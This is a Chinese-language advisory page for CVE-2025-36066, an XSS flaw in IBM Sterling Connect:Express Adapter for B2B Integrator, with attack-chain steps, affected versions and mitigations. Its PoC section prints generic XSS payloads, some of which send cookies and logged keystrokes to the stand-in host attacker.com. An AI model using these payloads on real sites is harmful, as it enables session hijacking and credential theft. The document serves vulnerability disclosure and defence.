CVE-2025-36066 IBM Sterling B2B Integrator跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-36066

漏洞类型

XSS跨站脚本

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0

漏洞概述

CVE-2025-36066是IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0版本中的一个跨站脚本（XSS）漏洞。该漏洞存在于Web UI界面中，由于应用程序对用户输入的验证和过滤不充分，攻击者可以在Web页面中注入恶意JavaScript代码。当其他合法用户访问包含恶意代码的页面时，这些脚本将在用户浏览器中执行，从而窃取用户会话凭证、劫持用户会话或进行其他恶意操作。此漏洞允许未经身份验证的远程攻击者利用，无需获取任何有效凭据即可发起攻击。攻击者通过诱导受害者点击特制链接或访问包含恶意脚本的页面，即可在受害者浏览器上下文中执行任意JavaScript代码，可能导致敏感信息泄露，包括用户凭证、会话Cookie等。由于该漏洞影响B2B集成系统的Web界面，在企业环境中可能导致严重的业务数据泄露风险。

技术细节

该漏洞是存储型或反射型跨站脚本（XSS）漏洞，存在于IBM Sterling Connect:Express Adapter的Web UI组件中。攻击者通过构造包含恶意JavaScript代码的特殊请求，在Web界面中注入脚本内容。漏洞的根本原因在于应用程序未对用户输入进行充分的HTML转义或内容安全策略（CSP）限制。攻击者可以利用此漏洞：1）在表单输入字段中注入脚本代码；2）通过URL参数传递恶意载荷；3）在页面内容中嵌入JavaScript代码。当受害者访问被污染的页面时，恶意脚本会在其浏览器上下文中执行，可用于窃取认证Cookie、获取用户输入的敏感数据、修改页面显示内容或重定向用户到钓鱼站点。由于该系统通常处理关键的B2B业务数据，攻击者可能通过XSS漏洞进一步进行横向移动或数据窃取。漏洞利用无需认证，但需要用户交互（点击链接或访问特定页面），符合CVSS向量中UI:R的要求。

攻击链分析

STEP 1

步骤1

攻击者识别目标IBM Sterling B2B Integrator的Web UI端点

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS载荷

STEP 3

步骤3

通过URL参数、表单输入或其他用户可控字段注入恶意脚本

STEP 4

步骤4

恶意代码被存储在服务器数据库中（存储型XSS）或通过URL反射给用户（反射型XSS）

STEP 5

步骤5

诱导受害者访问包含恶意代码的页面

STEP 6

步骤6

恶意JavaScript在受害者浏览器中执行，窃取Cookie、会话凭证或敏感数据

STEP 7

步骤7

攻击者利用窃取的凭证劫持用户会话或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-36066 XSS PoC -->
<!-- IBM Sterling B2B Integrator Web UI XSS Exploit -->

<!-- Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Cookie Stealing Payload -->
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">

<!-- Session Hijacking Payload -->
<script>
  fetch('http://attacker.com/log?data='+btoa(document.cookie));
</script>

<!-- Keylogger Payload -->
<script>
  document.addEventListener('keypress', function(e) {
    fetch('http://attacker.com/log?k='+e.key);
  });
</script>

<!-- Example Attack URL -->
<!-- https://target-host/sterling-ui/path?param=<script>alert(document.cookie)</script> -->

影响范围

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.00

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.01

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.02

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.03

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.04

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.05

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.06

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.07

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.08

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.09

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.10

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.11

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.12

防御指南

临时缓解措施

在安装官方补丁之前，可采取以下临时缓解措施：1）限制Web UI的访问权限，仅允许受信任的IP地址访问管理界面；2）启用Web应用防火墙（WAF）规则检测和阻止XSS攻击载荷；3）对所有用户输入实施严格的输入过滤和HTML转义；4）启用内容安全策略（CSP）响应头限制脚本执行；5）监控Web访问日志，排查异常的JavaScript代码注入行为；6）对管理员和用户进行安全意识培训，提醒不要点击可疑链接；7）考虑暂时禁用非必要的Web UI功能，减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36066
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36066
3 Details https://www.cvedetails.com/cve/CVE-2025-36066/
4 VulDB https://vuldb.com/cve/CVE-2025-36066
5 Link https://www.ibm.com/support/pages/node/7257244